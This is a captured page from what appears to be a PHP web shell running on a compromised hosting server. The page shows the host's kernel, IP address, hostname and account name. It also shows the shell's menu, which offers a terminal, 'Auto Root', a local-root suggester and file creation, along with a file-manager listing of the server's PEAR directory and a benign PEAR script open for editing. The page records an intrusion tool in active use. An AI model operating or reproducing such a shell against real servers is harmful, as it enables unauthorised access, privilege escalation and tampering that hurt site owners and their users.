Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php54 /
usr /
share /
pear /
Delete
Unzip
Name
Size
Permission
Date
Action
.channels
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
.pkgxml
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
.registry
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
Archive
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
Auth
[ DIR ]
drwxr-xr-x
2024-06-16 06:01
Bytekit
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
Console
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
File
[ DIR ]
drwxr-xr-x
2024-06-16 06:02
Mail
[ DIR ]
drwxr-xr-x
2024-06-16 06:01
Net
[ DIR ]
drwxr-xr-x
2024-06-16 06:01
OS
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
Object
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
PEAR
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
PHP
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
PHPUnit
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
PHP_CodeBrowser
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
PPW
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
SebastianBergmann
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
Structures
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
Symfony
[ DIR ]
drwxr-xr-x
2021-08-25 16:57
Text
[ DIR ]
drwxr-xr-x
2021-08-25 16:58
XML
[ DIR ]
drwxr-xr-x
2025-07-23 05:57
data
[ DIR ]
drwxr-xr-x
2025-05-12 19:54
ezc
[ DIR ]
drwxr-xr-x
2021-08-25 16:57
test
[ DIR ]
drwxr-xr-x
2025-05-12 19:54
.depdb
24.95
KB
-rw-r--r--
2021-08-25 16:58
.depdblock
0
B
-rw-r--r--
2021-08-25 16:58
.filemap
7.34
KB
-rw-r--r--
2025-05-12 19:54
.lock
0
B
-rw-r--r--
2025-05-12 19:54
Mail.php
9.65
KB
-rw-r--r--
2021-12-02 11:37
PEAR.php
35.39
KB
-rw-r--r--
2025-05-12 19:54
System.php
20.21
KB
-rw-r--r--
2025-05-12 19:54
pearcmd.php
14.64
KB
-rw-r--r--
2025-05-12 19:54
peclcmd.php
1.1
KB
-rw-r--r--
2025-05-12 19:54
Save
Rename
<?php /** * PEAR, the PHP Extension and Application Repository * * Command line interface * * PHP versions 4 and 5 * * @category pear * @package PEAR * @author Stig Bakken <ssb@php.net> * @author Tomas V.V.Cox <cox@idecnet.com> * @copyright 1997-2009 The Authors * @license http://opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/PEAR */ /** * @nodep Gtk */ //the space is needed for windows include paths with trailing backslash // http://pear.php.net/bugs/bug.php?id=19482 if ('/opt/alt/php54/usr/share/pear ' != '@'.'include_path'.'@ ') { ini_set('include_path', trim('/opt/alt/php54/usr/share/pear '). PATH_SEPARATOR . get_include_path()); $raw = false; } else { // this is a raw, uninstalled pear, either a cvs checkout, or php distro ini_set('include_path', __DIR__ . PATH_SEPARATOR . get_include_path()); $raw = true; } define('PEAR_RUNTYPE', 'pecl'); require_once 'pearcmd.php'; /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * indent-tabs-mode: nil * mode: php * End: */ // vim600:syn=php ?>